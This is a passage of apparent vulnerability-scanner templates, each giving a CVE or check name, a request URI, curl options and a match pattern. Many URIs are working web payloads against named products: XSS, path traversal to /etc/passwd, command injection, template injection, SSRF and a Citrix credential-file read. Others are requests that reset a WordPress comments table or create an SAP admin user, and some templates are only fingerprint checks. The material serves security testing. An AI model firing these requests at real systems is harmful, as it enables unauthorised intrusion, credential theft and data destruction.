-------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-24223 - Mara CMS 7.5 Reflective XSS' 3 | URI='/contact.php?theme=%3Csvg/onload=alert(1337)%3E' 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-25213_-_WP_File_Manager_File_Upload.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-25213 - WP File Manager File Upload' 3 | URI="/wp-content/plugins/wp-file-manager/readme.txt" 4 | METHOD='GET' 5 | MATCH="(Stable\stag\:\s[0-6]\.[0-8])" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -I " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-2551_-_Unauthenticated_Oracle_WebLogic_Server_Remote_Code_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2551 - Unauthenticated Oracle WebLogic Server Remote Code Execution' 3 | URI='/console/login/LoginForm.jsp' 4 | METHOD='GET' 5 | MATCH="10\.3\.6\.0|12\.1\.3\.0|12\.2\.1\.3|12\.2\.1\.4" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-2555_-_WebLogic_Server_Deserialization_RCE.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-2555 - WebLogic Server Deserialization RCE' 3 | URI="/console/login/LoginForm.jsp" 4 | METHOD='GET' 5 | MATCH="WebLogic" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-3187_-_Citrix_Unauthenticated_File_Deletion.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-3187 - Citrix Unauthenticated File Deletion' 3 | URI="/+CSCOE+/session_password.html" 4 | METHOD='GET' 5 | MATCH="webvpn" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -I " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-3452_-_Cisco_ASA-FTD_Arbitrary_File_Reading_Vulnerability.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-3452 - Cisco ASA/FTD Arbitrary File Reading Vulnerability' 3 | URI='/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../' 4 | METHOD='GET' 5 | MATCH="INTERNAL_PASSWORD_ENABLED|CONF_VIRTUAL_KEYBOARD" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-5284_-_Next_JS_Limited_Path_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5284 - Next JS Limited Path Traversal' 3 | URI="/_next/static/../server/pages-manifest.json" 4 | METHOD='GET' 5 | MATCH='\{\"/_app\":\".*?_app\.js\"' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-5405_-_Spring_Directory_Traversal_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 1' 3 | URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/passwd" 4 | METHOD='GET' 5 | MATCH="root:*:|nameserver|\[extensions\]" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-5405_-_Spring_Directory_Traversal_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 2' 3 | URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../etc/resolv.conf" 4 | METHOD='GET' 5 | MATCH="root:*:|nameserver|\[extensions\]" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-5405_-_Spring_Directory_Traversal_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5405 - Spring Directory Traversal 2' 3 | URI="/a/a/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f../Windows/win.ini" 4 | METHOD='GET' 5 | MATCH="root:*:|nameserver|\[extensions\]" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-5412_-_Full-read_SSRF_in_Spring_Cloud_Netflix.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5412 - Full-read SSRF in Spring Cloud Netflix' 3 | URI="/proxy.stream?origin=http://burpcollaborator.net/" 4 | METHOD='GET' 5 | MATCH="Burp\ Collaborator\ Server" 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 1' 3 | URI='/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp' 4 | METHOD='GET' 5 | MATCH='divGeneralRemoteSettingsTable' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-5902_-_F5_BIG-IP_Remote_Code_Execution_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5902 - F5 BIG-IP Remote Code Execution 2' 3 | URI='/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-5902_-_F5_BIG-IP_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-5902 - F5 BIG-IP XSS' 3 | URI='/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=%3Csvg/onload=alert(1337)%3E' 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-6287_-_Create_an_Administrative_User_in_SAP_NetWeaver_AS_JAVA.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-6287 - Create an Administrative User in SAP NetWeaver AS JAVA' 3 | URI="/CTCWebService/CTCWebServiceBean/ConfigServlet" 4 | METHOD='POST' 5 | MATCH="CTCWebServiceSi" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -L -s --insecure -H 'Content-Type: text/xml; charset=UTF-8' --data 'sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc{{base64('data')}}userDetails'" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-7048_-_WP_Database_Reset_3.15_Unauthenticated_Database_Reset.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-7048 - WP Database Reset 3.15 Unauthenticated Database Reset' 3 | URI='/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code=11111&db-reset-code-confirm=11111' 4 | METHOD='GET' 5 | MATCH='X-Redirect-By\:\ WordPress' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -I" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-7209_-_LinuxKI_Toolset_6.01_Remote_Command_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-7209 - LinuxKI Toolset 6.01 Remote Command Execution' 3 | URI="/linuxki/experimental/vis/kivis.php?type=kitrace&pid=1%3Becho%20%22bm9uZXhpc3RlbnQ%3D%22%20%7C%20base64%20-d" 4 | METHOD='GET' 5 | MATCH='nonexistent' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-7246_-_qdPM_Authenticated_Remote_Code_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-7246 - qdPM Authenticated Remote Code Execution' 3 | URI="/" 4 | METHOD='GET' 5 | MATCH='qdPM 9.' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-7473_Citrix_ShareFile_StorageZones.disabled: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-7473 Citrix ShareFile StorageZones Unauthenticated Access' 3 | URI="/UploadTest.aspx" 4 | METHOD='GET' 5 | MATCH="content\-length\:\ 0" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS='-L -I --user-agent '' -s --insecure' 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-8115_-_Revive_Adserver_XSS.py: -------------------------------------------------------------------------------- 1 | # Import any WebDriver class that you would usually import from 2 | # selenium.webdriver from the seleniumrequests module 3 | import sys 4 | from seleniumrequests import Firefox 5 | 6 | url = sys.argv[1] 7 | # Simple usage with built-in WebDrivers: 8 | webdriver = Firefox() 9 | response = webdriver.request('GET', '%s/www/delivery/afr.php?refresh=10000&")\',10000000);document.write(1+1336);setTimeout(\'alert("' % url) 10 | if '1337' in response.text: 11 | print("Vulnerable!") 12 | webdriver.quit() -------------------------------------------------------------------------------- /templates/active/CVE-2020-8115_-_Revive_Adserver_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8115 - Revive Adserver XSS' 3 | URI="/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\"" 4 | METHOD='GET' 5 | MATCH="\);alert\(1\);setTimeout\('alert\(\"&loc='" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-8163_-_Rails_5.0.1_Remote_Code_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8163 - Rails < 5.0.1 Remote Code Execution' 3 | URI='/?system(%27echo+$((1%2B1787568))%27)%3ba%23' 4 | METHOD='GET' 5 | MATCH="1787569" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-8191_-_Citrix_ADC_NetScaler_Gateway_Reflected_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8191 - Citrix ADC & NetScaler Gateway Reflected XSS' 3 | URI="/menu/stapp" 4 | METHOD='POST' 5 | MATCH="" 6 | SEVERITY='P1 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: 'X-NITRO-USER: xpyZxwy6' --data 'sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot'" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-8193_-_Citrix_Unauthenticated_LFI.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8193 - Citrix Unauthenticated LFI' 3 | URI="/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1" 4 | METHOD='POST' 5 | MATCH="SESSID" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Content-Type: application/xml' -H 'X-NITRO-USER: xpyZxwy6' -H 'X-NITRO-PASS: xWXHUJ56' -I --data ''" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-8194_-_Citrix_ADC_NetScaler_Gateway_Reflected_Code_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8194 - Citrix ADC & NetScaler Gateway Reflected Code Injection' 3 | URI="/menu/guiw?nsbrand=1&protocol=nonexistent.1337\">&id=3&nsvpx=phpinfo" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: startupapp=st' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-8209_-_Citrix_XenMobile_Server_Path_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8209 - Citrix XenMobile Server Path Traversal' 3 | URI="/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd" 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Config_Password_Disclosure.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8209 - XenMobile-Citrix Endpoint Management Config Password Disclosure' 3 | URI='/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties' 4 | METHOD='GET' 5 | MATCH="database\.password" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-8209_-_XenMobile-Citrix_Endpoint_Management_Path_Traversal.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8209 - XenMobile-Citrix Endpoint Management Path Traversal' 3 | URI='/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd' 4 | METHOD='GET' 5 | MATCH="root:*:" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-8512_-_IceWarp_WebMail_XSS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8512 - IceWarp WebMail XSS' 3 | URI="/webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22" 4 | METHOD='GET' 5 | MATCH="" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-8772_-_IfiniteWP_Client_1.9.4.5_Authentication_Bypass_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8772 - InfiniteWP Client 1.9.4.5 - Authentication Bypass 1' 3 | URI='/wp-admin/' 4 | METHOD='POST' 5 | MATCH="IWPHEADER" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' --data '_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ=='" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-8982_-_Citrix_ShareFile_StorageZones_Unauthenticated_Arbitrary_File_Read.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-8982 - Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read' 3 | URI="/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri" 4 | METHOD='GET' 5 | MATCH="bit\ app\ support" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s --insecure " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-9047_-_exacqVision_Web_Service_Remote_Code_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-9047 - exacqVision Web Service Remote Code Execution' 3 | URI="/version.web" 4 | METHOD='GET' 5 | MATCH="3\.10\.4\.72058|3\.12\.4\.76544|3\.8\.2\.67295|7\.0\.2\.81005|7\.2\.7\.86974|7\.4\.3\.89785|7\.6\.4\.94391|7\.8\.2\.97826|8\.0\.6\.105408|8\.2\.2\.107285|8\.4\.3\.111614|8\.6\.3\.116175|8\.8\.1\.118913|9\.0\.3\.124620|9\.2\.0\.127940|9\.4\.3\.137684|9\.6\.7\.145949|9\.8\.4\.149166|19\.03\.3\.152166|19\.06\.4\.157118|19\.09\.4\.0|19\.12\.2\.0|20\.03\.2\.0|20\.06\.3\.0" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-9054_-_ZyXEL_NAS_Remote_Code_Execution.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-9054 - ZyXEL NAS Remote Code Execution' 3 | URI="/cgi-bin/weblogin.cgi?username=admin';echo \$((1+1787568))" 4 | METHOD='GET' 5 | MATCH="1787569" 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-9484_-_Apache_Tomcat_RCE_by_deserialization.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-9484 - Apache Tomcat RCE by deserialization' 3 | URI="/index.jsp" 4 | METHOD='GET' 5 | MATCH='ObjectInputStream|PersistentManagerBase' 6 | SEVERITY='P1 - CRITICAL' 7 | CURL_OPTS="--user-agent '' -s --insecure -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' " 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/CVE-2020-9757_-_SEOmatic_3.3.0_Server-Side_Template_Injection.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='CVE-2020-9757 - SEOmatic < 3.3.0 Server-Side Template Injection' 3 | URI="/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}" 4 | METHOD='GET' 5 | MATCH="22344" 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Cisco_VPN_Login_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Cisco VPN Login Detected' 3 | URI='/+CSCOE+/logon.html' 4 | METHOD='GET' 5 | MATCH="CSCO_Format" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Cisco_VPN_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Cisco VPN Detected' 3 | URI='/+CSCOE+/win.js' 4 | METHOD='GET' 5 | MATCH="CSCO_WebVPN" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Citrix-Access-Gateway_Detected.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Citrix-Access-Gateway Detected' 3 | URI='/vpn/index.html' 4 | METHOD='GET' 5 | MATCH='Netscaler Gateway' 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Citrix_VPN_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Citrix VPN Detected' 3 | URI='/vpn/index.html' 4 | METHOD='GET' 5 | MATCH="Netscaler\ Gateway" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Citrix_VPN_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Citrix VPN Detected 2' 3 | URI='/vpn/index.html' 4 | METHOD='GET' 5 | MATCH="NetScaler " 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Clear-text_Communications_HTTP.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Clear-Text Protocol - HTTP' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='200 OK' 6 | SEVERITY='P2 - HIGH' 7 | CURL_OPTS="--user-agent '' -s" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Clickjacking.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Clickjacking' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH='X-Frame-Options' 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -I" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' 10 | SEARCH="negative" -------------------------------------------------------------------------------- /templates/active/Common_Status_File_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Common Status File Detected 1' 3 | URI='/.perf' 4 | METHOD='GET' 5 | MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue" 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Common_Status_File_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Common Status File Detected 2' 3 | URI='/server-status' 4 | METHOD='GET' 5 | MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue" 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Common_Status_File_Scanner_3.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Common Status File Detected 3' 3 | URI='/status.html' 4 | METHOD='GET' 5 | MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue" 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Confluence_Scanner.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Atlassian Confluence Detected' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="Atlassian\ Confluence" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Contact_Form_7_Wordpress_Plugin_Found_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Contact Form 7 Wordpress Plugin Found 1' 3 | URI="/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt" 4 | METHOD='GET' 5 | MATCH="Contact\ Form\ 7" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Contact_Form_7_Wordpress_Plugin_Found_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Contact Form 7 Wordpress Plugin Found 2' 3 | URI="/wordpress/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt" 4 | METHOD='GET' 5 | MATCH="Contact\ Form\ 7" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Directory_Listing_Enabled.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Directory Listing Enabled' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="Index\ of|To\ Parent\ Directory" 6 | SEVERITY='P4 - LOW' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Drupal_Install_Found.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal Install Found' 3 | URI='/install.php?profile=default' 4 | METHOD='GET' 5 | MATCH='Choose language | Drupal' 6 | SEVERITY='P3 - MEDIUM' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Drupal_Scanner_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Drupal Detected 1' 3 | URI='/' 4 | METHOD='GET' 5 | MATCH="drupal\.org" 6 | SEVERITY='P5 - INFO' 7 | CURL_OPTS="--user-agent '' -s -L --insecure" 8 | SECONDARY_COMMANDS='' 9 | GREP_OPTIONS='-i' -------------------------------------------------------------------------------- /templates/active/Drupal_Scanner_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | 